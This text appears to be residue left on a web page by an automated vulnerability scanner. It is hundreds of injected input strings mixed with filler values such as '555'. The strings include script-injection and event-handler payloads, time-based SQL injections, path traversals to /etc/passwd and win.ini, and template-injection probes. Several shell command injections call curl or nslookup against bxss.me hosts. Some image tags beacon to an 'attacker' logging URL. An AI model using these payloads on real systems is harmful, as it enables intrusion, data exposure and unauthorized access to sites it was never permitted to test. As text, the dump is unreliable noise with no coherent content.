Server

555

1CPl7vlYO

555

555

555<esi:include src="http://bxss.me/rpb.png"/>

../../../../../../../../../../../../../../etc/passwd

QxQtPadk

echo haieoo$()\ qymoop\nz^xyu||a #' &echo haieoo$()\ qymoop\nz^xyu||a #|" &echo haieoo$()\ qymoop\nz^xyu||a #

response.write(9849786*9579246)

'+response.write(9849786*9579246)+'

&echo ojcjet$()\ ddzmkf\nz^xyu||a #' &echo ojcjet$()\ ddzmkf\nz^xyu||a #|" &echo ojcjet$()\ ddzmkf\nz^xyu||a #

555

../../../../../../../../../../../../../../windows/win.ini

555

555

file:///etc/passwd

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

${9999226+9999095}

555&echo fpdkrw$()\ wgyfbi\nz^xyu||a #' &echo fpdkrw$()\ wgyfbi\nz^xyu||a #|" &echo fpdkrw$()\ wgyfbi\nz^xyu||a #

"+response.write(9849786*9579246)+"

-1 OR 2+691-691-1=0+0+0+1 --

555

)

../555

-1 OR 3+691-691-1=0+0+0+1 --

555

|echo vpmwdz$()\ kmfjoy\nz^xyu||a #' |echo vpmwdz$()\ kmfjoy\nz^xyu||a #|" |echo vpmwdz$()\ kmfjoy\nz^xyu||a #

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555&n923091=v953540

555

HttP://bxss.me/t/xss.html?%00

555

Http://bxss.me/t/fit.txt

'.gethostbyname(lc('hitbr'.'mkeysedpedcf1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(89).chr(101).chr(76).'

555|echo fqbhma$()\ hjpudd\nz^xyu||a #' |echo fqbhma$()\ hjpudd\nz^xyu||a #|" |echo fqbhma$()\ hjpudd\nz^xyu||a #

555

-1 OR 3*2<(0+5+691-691) --

./555

!(()&&!|*|*|

(nslookup -q=cname hitqgvhuzdrqe921dc.bxss.me||curl hitqgvhuzdrqe921dc.bxss.me))

$(nslookup -q=cname hitkwbjlmzkby583c7.bxss.me||curl hitkwbjlmzkby583c7.bxss.me)

^(#$!@#$)(()))******

555

-1 OR 3*2>(0+5+691-691) --

555

555

".gethostbyname(lc("hitzo"."rpohwdkg4f0b9.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(66).chr(99).chr(79)."

http://bxss.me/t/fit.txt?.jpg

comments

'

bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(105).concat(87).concat(115).concat(87)+(require"socket" Socket.gethostbyname("hitjk"+"yikpujjk16b17.bxss.me.")[3].to_s)+"

'+'A'.concat(70-3).concat(22*4).concat(106).concat(79).concat(97).concat(66)+(require'socket' Socket.gethostbyname('hitgs'+'buwhqtqi7f5a2.bxss.me.')[3].to_s)+'

555

xfs.bxss.me

"

comments

/etc/shells

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1 OR 2+836-836-1=0+0+0+1

555

555

&nslookup -q=cname hitjdxarfvhjx97009.bxss.me&'\"`0&nslookup -q=cname hitjdxarfvhjx97009.bxss.me&`'

&(nslookup -q=cname hitjkeigecvsdc84e0.bxss.me||curl hitjkeigecvsdc84e0.bxss.me)&'\"`0&(nslookup -q=cname hitjkeigecvsdc84e0.bxss.me||curl hitjkeigecvsdc84e0.bxss.me)&`'

555

555

-1 OR 3+836-836-1=0+0+0+1

555

'"()

555

c:/windows/win.ini

comments/.

${@print(md5(31337))}

905743

555

555

555'&&sleep(27*1000)*ldsoma&&'

http://xfs.bxss.me?71.22

555"&&sleep(27*1000)*iflozh&&"

555

${@print(md5(31337))}\

555

bxss.me

555'"()&%<zzz><ScRiPt >AAXu(9610)</ScRiPt>

'"

-1 OR 3*2<(0+5+836-836)

555

555

|(nslookup -q=cname hitbbclwhrgdc0596b.bxss.me||curl hitbbclwhrgdc0596b.bxss.me)

xfs.bxss.me?71.22

//xfs.bxss.me?71.22

`(nslookup -q=cname hitljmswggnod8464b.bxss.me||curl hitljmswggnod8464b.bxss.me)`

555

-1 OR 3*2>(0+5+836-836)

<!--

'"()&%<zzz><ScRiPt >AAXu(9680)</ScRiPt>

555

555

'.print(md5(31337)).'

555'||sleep(27*1000)*xfsven||'

555"||sleep(27*1000)*gxmdee||"

555

555

555

5559323546

555

-1' OR 2+277-277-1=0+0+0+1 --

555

/\xfs.bxss.me?71.22

555

555

-1' OR 3+277-277-1=0+0+0+1 --

555

bfg7984\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7984

555

555

555

555

555

555

bfgx3052\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3052

-1' OR 3*2<(0+5+277-277) --

555

555

-1' OR 3*2>(0+5+277-277) --

<%={{={@{#{${dfb}}%>

555

555

555

555

555

555

555

-1' OR 2+559-559-1=0+0+0+1 or '011cWGpe'='

555

555

555

555

<th:t="${dfb}#foreach

-1' OR 3+559-559-1=0+0+0+1 or '011cWGpe'='

555

555

-1" OR 2+761-761-1=0+0+0+1 --

555

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

-1" OR 3+761-761-1=0+0+0+1 --

555

555

555

dfb{{98991*97996}}xca

555

555

555

555

555

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >AAXu(9975)</ScRiPt>

555<W27KCC>3RUWF[!+!]</W27KCC>

555<script>AAXu(9796)</script>

555*if(now()=sysdate(),sleep(15),0)

555<script>AAXu(9504)</script>9504

555<ScR<ScRiPt>IpT>AAXu(9262)</sCr<ScRiPt>IpT>

555<ScRiPt >AAXu(9954)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9692></ScRiPt>

555<ScRiPt >AAXu(9551)</ScRiPt>

555<svg  \xa0onload=AAXu(9594)

555<isindex type=image src=1 onerror=AAXu(9193)>

555<iframe src='data:text/html

555<body onload=AAXu(9683)>

555<img src=//xss.bxss.me/t/dot.gif onload=AAXu(9802)>

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

555<img src=xyz OnErRor=AAXu(9201)>

555<img/src=">" onerror=alert(9033)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%41%41%58%75%289980%29%3C%2F%73%43%72%69%70%54%3E

555\u003CScRiPt\AAXu(9055)\u003C/sCripT\u003E

555&lt

\xf6<img zzz onmouseover=AAXu(92521) //\xf6>

555<input autofocus onfocus=AAXu(9532)>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(AAXu(9059))}

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

555UkdUR <ScRiPt >AAXu(9225)</ScRiPt>

555<WI3MMP>M3TKD[!+!]</WI3MMP>

555<ifRAme sRc=9392.com></IfRamE>

555<ac2Ru0K x=9931>

555<img sRc='http://attacker-9980/log.php?

555<ae3azhT<

555

555

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555-1

555-1)

555-1 waitfor delay '0:0:15' --

555'"()&%<zzz><ScRiPt >fci8(9150)</ScRiPt>

555'"()&%<zzz><ScRiPt >oiQ2(9117)</ScRiPt>

'"()&%<zzz><ScRiPt >fci8(9003)</ScRiPt>

'"()&%<zzz><ScRiPt >oiQ2(9016)</ScRiPt>

5559513575

5559650322

555KY0Er1bs'

bfg1907\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1907

bfg8977\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8977

bfgx9459\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9459

bfgx9434\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9434

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555-1 OR 70=(SELECT 70 FROM PG_SLEEP(15))--

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >T1xh(9995)</ScRiPt>

555-1) OR 964=(SELECT 964 FROM PG_SLEEP(15))--

'"()&%<zzz><ScRiPt >T1xh(9611)</ScRiPt>

dfb{{98991*97996}}xca

555

5559657744

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

bfg3513\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3513

bfgx8296\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8296

555-1)) OR 533=(SELECT 533 FROM PG_SLEEP(15))--

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

dfb__${98991*97996}__::.x

555'"()&%<zzz><ScRiPt >GdIt(9739)</ScRiPt>

<th:t="${dfb}#foreach

555<ScRiPt >fci8(9118)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'"()&%<zzz><ScRiPt >GdIt(9316)</ScRiPt>

555FGuzYmGU' OR 211=(SELECT 211 FROM PG_SLEEP(15))--

555<ScRiPt >oiQ2(9441)</ScRiPt>

5559721172

555<WQ1QAI>ZUXAM[!+!]</WQ1QAI>

555

bfg10972\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10972

555<WS7ZF9>MQWT3[!+!]</WS7ZF9>

555OILD0bcB') OR 118=(SELECT 118 FROM PG_SLEEP(15))--

555<script>fci8(9001)</script>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<script>fci8(9710)</script>9710

555<script>oiQ2(9279)</script>

bfgx8436\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8436

555<ScR<ScRiPt>IpT>fci8(9784)</sCr<ScRiPt>IpT>

<%={{={@{#{${dfb}}%>

555<script>oiQ2(9890)</script>9890

dfb[[${98991*97996}]]xca

555e1sLT5zf')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--

555

555'"()&%<zzz><ScRiPt >NVnD(9713)</ScRiPt>

555<ScRiPt >fci8(9660)</ScRiPt>

555

555<ScR<ScRiPt>IpT>oiQ2(9056)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >NVnD(9702)</ScRiPt>

XfowHJJZ

dfb__${98991*97996}__::.x

echo tflaea$()\ mezoek\nz^xyu||a #' &echo tflaea$()\ mezoek\nz^xyu||a #|" &echo tflaea$()\ mezoek\nz^xyu||a #

1ls30itSO

response.write(9543927*9212648)

5559609967

555

555<ScRiPt >oiQ2(9039)</ScRiPt>

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9638></ScRiPt>

555

&echo avincq$()\ xclpzq\nz^xyu||a #' &echo avincq$()\ xclpzq\nz^xyu||a #|" &echo avincq$()\ xclpzq\nz^xyu||a #

'+response.write(9543927*9212648)+'

../../../../../../../../../../../../../../etc/passwd

555&echo omoqzn$()\ sdeige\nz^xyu||a #' &echo omoqzn$()\ sdeige\nz^xyu||a #|" &echo omoqzn$()\ sdeige\nz^xyu||a #

|echo bozjwn$()\ jlsmdm\nz^xyu||a #' |echo bozjwn$()\ jlsmdm\nz^xyu||a #|" |echo bozjwn$()\ jlsmdm\nz^xyu||a #

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9455></ScRiPt>

../../../../../../../../../../../../../../windows/win.ini

bfg8476\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8476

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<esi:include src="http://bxss.me/rpb.png"/>

${9999946+10000406}

"+response.write(9543927*9212648)+"

555|echo qjvsrw$()\ haycio\nz^xyu||a #' |echo qjvsrw$()\ haycio\nz^xyu||a #|" |echo qjvsrw$()\ haycio\nz^xyu||a #

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555<ScRiPt >fci8(9786)</ScRiPt>

(nslookup -q=cname hitgxscpyvpqn66a67.bxss.me||curl hitgxscpyvpqn66a67.bxss.me))

555

555

12345'"\'\")

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

file:///etc/passwd

555

bfgx10397\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10397

Http://bxss.me/t/fit.txt

555<ScRiPt >oiQ2(9481)</ScRiPt>

dfb{98991*97996}xca

555<svg  \xa0onload=fci8(9857)

555&n905308=v950159

555

555

555<ScRiPt >T1xh(9722)</ScRiPt>

555

555

$(nslookup -q=cname hitgufdereleqb3a83.bxss.me||curl hitgufdereleqb3a83.bxss.me)

http://bxss.me/t/fit.txt?.jpg

555

../555

555

'.gethostbyname(lc('hitwb'.'uodnnoihef1f8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(85).chr(97).chr(90).'

dfb${98991*97996}xca

555

)

<%={{={@{#{${dfb}}%>

555<svg  \xa0onload=oiQ2(9915)

&nslookup -q=cname hitvhephpdeif0eb01.bxss.me&'\"`0&nslookup -q=cname hitvhephpdeif0eb01.bxss.me&`'

/etc/shells

555

'

".gethostbyname(lc("hitbm"."mbvggmbvfd28c.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(81).chr(111).chr(85)."

555

555<WPT0IW>WFPTY[!+!]</WPT0IW>

555<isindex type=image src=1 onerror=fci8(9938)>

<th:t="${dfb}#foreach

555

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

"

555

!(()&&!|*|*|

&(nslookup -q=cname hitmgmglpkbeuc35ee.bxss.me||curl hitmgmglpkbeuc35ee.bxss.me)&'\"`0&(nslookup -q=cname hitmgmglpkbeuc35ee.bxss.me||curl hitmgmglpkbeuc35ee.bxss.me)&`'

c:/windows/win.ini

555

555

dfb#{98991*97996}xca

z3MU0OWh

${@print(md5(31337))}

${@print(md5(31337))}\

555<iframe src='data:text/html

555

bxss.me

^(#$!@#$)(()))******

555<isindex type=image src=1 onerror=oiQ2(9652)>

555

|(nslookup -q=cname hitcpwomnogdj88750.bxss.me||curl hitcpwomnogdj88750.bxss.me)

555

555<script>T1xh(9272)</script>

555

'.print(md5(31337)).'

HttP://bxss.me/t/xss.html?%00

555

555

555<iframe src='data:text/html

bxss.me/t/xss.html?%00

555

'"()

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(79).concat(117).concat(68)+(require"socket" Socket.gethostbyname("hitqj"+"hefwfbpi28d73.bxss.me.")[3].to_s)+"

`(nslookup -q=cname hitbjriprqtyj785b3.bxss.me||curl hitbjriprqtyj785b3.bxss.me)`

555

dfb{#98991*97996}xca

555

555

555

555'&&sleep(27*1000)*xclnyl&&'

555

555

555

555

555<body onload=fci8(9813)>

'+'A'.concat(70-3).concat(22*4).concat(118).concat(82).concat(111).concat(76)+(require'socket' Socket.gethostbyname('hitnx'+'hdhxqafz4527f.bxss.me.')[3].to_s)+'

555

555<script>T1xh(9574)</script>9574

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555"&&sleep(27*1000)*qouauo&&"

comments

555

dfb{@98991*97996}xca

555

555

555

555<body onload=oiQ2(9852)>

555'||sleep(27*1000)*rqimel||'

comments

555

555

555<img src=//xss.bxss.me/t/dot.gif onload=fci8(9953)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

555<ScR<ScRiPt>IpT>T1xh(9160)</sCr<ScRiPt>IpT>

555

555

555

555"||sleep(27*1000)*mvswmx||"

comments/.

555

dfb{{=98991*97996}}xca

555

555<img src=//xss.bxss.me/t/dot.gif onload=oiQ2(9638)>

555

xfs.bxss.me

'"

555<img src=xyz OnErRor=fci8(9696)>

555

555

555

555

555

555

555<ScRiPt >T1xh(9046)</ScRiPt>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=oiQ2(9201)>

555

555

555

dfb@(98991*97996)xca

<!--

555'"()&%<zzz><ScRiPt >jJE5(9241)</ScRiPt>

555fTTjNozw

555

555

555

dfb[[${98991*97996}]]xca

555

555<img/src=">" onerror=alert(9476)>

555

'"()&%<zzz><ScRiPt >jJE5(9953)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9418></ScRiPt>

555<img/src=">" onerror=alert(9570)>

555

dfb<%=98991*97996%>xca

555

555

5559355406

555<ScRiPt >T1xh(9680)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%69%51%32%289860%29%3C%2F%73%43%72%69%70%54%3E

555

555

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%66%63%69%38%289944%29%3C%2F%73%43%72%69%70%54%3E

dfb__${98991*97996}__::.x

555

555<svg  \xa0onload=T1xh(9775)

dfb#set($x=98991*97996)${x}xca

555

555

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555

555

555

555\u003CScRiPt\fci8(9574)\u003C/sCripT\u003E

555<isindex type=image src=1 onerror=T1xh(9032)>

555\u003CScRiPt\oiQ2(9048)\u003C/sCripT\u003E

dfb{{"abc"|title}}xca

555

555

555'"()&%<zzz><ScRiPt >oBY9(9109)</ScRiPt>

555<ScRiPt >NVnD(9966)</ScRiPt>

-1 OR 2+631-631-1=0+0+0+1 --

555

555

555'"()&%<zzz><ScRiPt >RyJ5(9377)</ScRiPt>

555&lt

555&lt

555<iframe src='data:text/html

-1 OR 2+628-628-1=0+0+0+1

print("dfb" . 98991*97996 . "xca")

'"()&%<zzz><ScRiPt >oBY9(9398)</ScRiPt>

555<WTDIEQ>RDJLL[!+!]</WTDIEQ>

-1' OR 2+160-160-1=0+0+0+1 --

555<body onload=T1xh(9284)>

98991*97996*98991*97996

-1' OR 2+381-381-1=0+0+0+1 or '8LpbXELc'='

\xf6<img zzz onmouseover=fci8(93411) //\xf6>

\xf6<img zzz onmouseover=oiQ2(94321) //\xf6>

'"()&%<zzz><ScRiPt >RyJ5(9815)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=T1xh(9768)>

555<input autofocus onfocus=fci8(9692)>

dfb{@math key=98991 method="multiply" operand=97996/}xca

555<script>NVnD(9849)</script>

-1" OR 2+115-115-1=0+0+0+1 --

5559396815

555'"()&%<zzz><ScRiPt >ufLz(9434)</ScRiPt>

555'"()&%<zzz><ScRiPt >N5bQ(9887)</ScRiPt>

5559193328

555<img src=xyz OnErRor=T1xh(9393)>

555<input autofocus onfocus=oiQ2(9075)>

555

<a HrEF=http://xss.bxss.me></a>

dfb{{{this}}}xca

555<script>NVnD(9642)</script>9642

bfg3044\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3044

555'"()&%<zzz><ScRiPt >hAH8(9951)</ScRiPt>

555'"()&%<zzz><ScRiPt >s2NI(9931)</ScRiPt>

'"()&%<zzz><ScRiPt >ufLz(9836)</ScRiPt>

'"()&%<zzz><ScRiPt >N5bQ(9001)</ScRiPt>

bfg2135\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2135

555

555<img/src=">" onerror=alert(9985)>

<a HrEF=http://xss.bxss.me></a>

5559476434

'"()&%<zzz><ScRiPt >hAH8(9203)</ScRiPt>

5559667703

'"()&%<zzz><ScRiPt >s2NI(9921)</ScRiPt>

bfgx1880\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1880

<a HrEF=jaVaScRiPT:>

555

555<ScR<ScRiPt>IpT>NVnD(9008)</sCr<ScRiPt>IpT>

#{98991*97996*98991*97996}

bfgx1995\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1995

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%31%78%68%289391%29%3C%2F%73%43%72%69%70%54%3E

555

bfg4215\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4215

555*if(now()=sysdate(),sleep(15),0)

<a HrEF=jaVaScRiPT:>

5559018604

dfb#{xca}=123

555

bfg6832\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6832

<%={{={@{#{${dfb}}%>

5559263378

555}body{zzz:Expre/**/SSion(fci8(9838))}

555<ScRiPt >NVnD(9744)</ScRiPt>

<%={{={@{#{${dfb}}%>

555

dfb{{'abcd'.toUpperCase()}}xca

bfg5767\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5767

bfgx3226\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3226

555

555\u003CScRiPt\T1xh(9212)\u003C/sCripT\u003E

555}body{zzz:Expre/**/SSion(oiQ2(9947))}

555

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9753></ScRiPt>

bfgx10309\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10309

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

bfgx8603\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8603

555cjHIW <ScRiPt >fci8(9703)</ScRiPt>

bfg7952\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7952

555

<th:t="${dfb}#foreach

555VdVt7 <ScRiPt >oiQ2(9372)</ScRiPt>

555&lt

<%={{={@{#{${dfb}}%>

555

dfb{{98991*97996}}xca

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<ScRiPt >NVnD(9447)</ScRiPt>

<th:t="${dfb}#foreach

555<WKTMOF>ZFUCR[!+!]</WKTMOF>

555<WJXATM>DSEZA[!+!]</WJXATM>

bfgx9323\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9323

555

555

dfb[[${98991*97996}]]xca

\xf6<img zzz onmouseover=T1xh(94271) //\xf6>

<th:t="${dfb}#foreach

555

555<ifRAme sRc=9535.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

555<svg  \xa0onload=NVnD(9076)

dfb__${98991*97996}__::.x

555<ifRAme sRc=9764.com></IfRamE>

<th:t="${dfb}#foreach

555

555

555<aA1aPb7 x=9179>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<isindex type=image src=1 onerror=NVnD(9765)>

555<input autofocus onfocus=T1xh(9185)>

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<aarn3vA x=9179>

555<img sRc='http://attacker-9920/log.php?

555

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

555

<a HrEF=http://xss.bxss.me></a>

555<iframe src='data:text/html

555<aLPhAOb<

555

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9816/log.php?

555<ScRiPt >GdIt(9279)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555<body onload=NVnD(9606)>

555

dfb__${98991*97996}__::.x

555<a5SHAXn<

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WC8SSD>WD8QF[!+!]</WC8SSD>

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=//xss.bxss.me/t/dot.gif onload=NVnD(9344)>

555}body{zzz:Expre/**/SSion(T1xh(9923))}

555

dfb{{98991*97996}}xca

555<script>GdIt(9393)</script>

dfb__${98991*97996}__::.x

555

dfb${98991*97996}xca

555<ScRiPt >oBY9(9555)</ScRiPt>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=xyz OnErRor=NVnD(9905)>

555MLuMY <ScRiPt >T1xh(9781)</ScRiPt>

555<script>GdIt(9348)</script>9348

555<WKQ0CN>XBPAH[!+!]</WKQ0CN>

dfb#{98991*97996}xca

dfb[[${98991*97996}]]xca

555-1

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<img/src=">" onerror=alert(9871)>

555<WZKSYO>RCK5B[!+!]</WZKSYO>

555<ScRiPt >RyJ5(9365)</ScRiPt>

555<ScR<ScRiPt>IpT>GdIt(9606)</sCr<ScRiPt>IpT>

555<script>oBY9(9637)</script>

dfb[[${98991*97996}]]xca

dfb{#98991*97996}xca

555<ifRAme sRc=9299.com></IfRamE>

555<WPDIKW>IRWCX[!+!]</WPDIKW>

555<ScRiPt >GdIt(9400)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

%35%35%35%3C%53%63%52%69%50%74%20%3E%4E%56%6E%44%289712%29%3C%2F%73%43%72%69%70%54%3E

555<script>oBY9(9066)</script>9066

dfb__${98991*97996}__::.x

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9409></ScRiPt>

555<script>RyJ5(9401)</script>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\u003CScRiPt\NVnD(9262)\u003C/sCripT\u003E

dfb{@98991*97996}xca

555<aT5vVsM x=9101>

555<ScRiPt >GdIt(9873)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555-1)

555<ScR<ScRiPt>IpT>oBY9(9023)</sCr<ScRiPt>IpT>

555<ScRiPt >ufLz(9037)</ScRiPt>

555<script>RyJ5(9626)</script>9626

555<ScRiPt >N5bQ(9262)</ScRiPt>

555<WOVMOU>PCC8I[!+!]</WOVMOU>

555<ScRiPt >oBY9(9328)</ScRiPt>

555<svg  \xa0onload=GdIt(9949)

555<img sRc='http://attacker-9699/log.php?

555&lt

555<ScRiPt >s2NI(9344)</ScRiPt>

dfb{{=98991*97996}}xca

555<WX6V5M>JOMMG[!+!]</WX6V5M>

555'"()&%<zzz><ScRiPt >mjoN(9873)</ScRiPt>

555'"()&%<zzz><ScRiPt >30s3(9746)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9587></ScRiPt>

dfb@(98991*97996)xca

555<script>ufLz(9003)</script>

555-1 waitfor delay '0:0:15' --

555<isindex type=image src=1 onerror=GdIt(9092)>

555<aBhTzEy<

\xf6<img zzz onmouseover=NVnD(95781) //\xf6>

555<W2GRT6>N3K5B[!+!]</W2GRT6>

555<ScR<ScRiPt>IpT>RyJ5(9461)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >30s3(9291)</ScRiPt>

'"()&%<zzz><ScRiPt >mjoN(9402)</ScRiPt>

dfb<%=98991*97996%>xca

555<script>N5bQ(9590)</script>

555<ScRiPt >oBY9(9407)</ScRiPt>

555<script>ufLz(9666)</script>9666

5559587601

555<iframe src='data:text/html

555<input autofocus onfocus=NVnD(9997)>

555<script>s2NI(9530)</script>

555<ScRiPt >RyJ5(9002)</ScRiPt>

5559606643

555<script>N5bQ(9139)</script>9139

555<ScR<ScRiPt>IpT>ufLz(9393)</sCr<ScRiPt>IpT>

dfb#set($x=98991*97996)${x}xca

555<svg  \xa0onload=oBY9(9172)

bfg5171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5171

bfg3726\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3726

555<body onload=GdIt(9778)>

<a HrEF=http://xss.bxss.me></a>

555<script>s2NI(9257)</script>9257

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9600></ScRiPt>

555<ScR<ScRiPt>IpT>N5bQ(9078)</sCr<ScRiPt>IpT>

555<isindex type=image src=1 onerror=oBY9(9137)>

555<ScRiPt >RyJ5(9362)</ScRiPt>

555Zhx6bBZw'

555<ScRiPt >ufLz(9836)</ScRiPt>

bfgx3318\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3318

bfgx8749\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8749

dfb{{"abc"|title}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=GdIt(9013)>

555<ScR<ScRiPt>IpT>s2NI(9984)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >N5bQ(9096)</ScRiPt>

555<iframe src='data:text/html

555<svg  \xa0onload=RyJ5(9325)

555'"()&%<zzz><ScRiPt >9PjQ(9732)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9442></ScRiPt>

print("dfb" . 98991*97996 . "xca")

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(NVnD(9265))}

555<ScRiPt >s2NI(9924)</ScRiPt>

555<img src=xyz OnErRor=GdIt(9203)>

<%={{={@{#{${dfb}}%>

555<body onload=oBY9(9673)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9906></ScRiPt>

555<isindex type=image src=1 onerror=RyJ5(9868)>

555<ScRiPt >ufLz(9401)</ScRiPt>

'"()&%<zzz><ScRiPt >9PjQ(9595)</ScRiPt>

555

555'"()&%<zzz><ScRiPt >DaC0(9760)</ScRiPt>

98991*97996*98991*97996

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9046></ScRiPt>

555<img/src=">" onerror=alert(9748)>

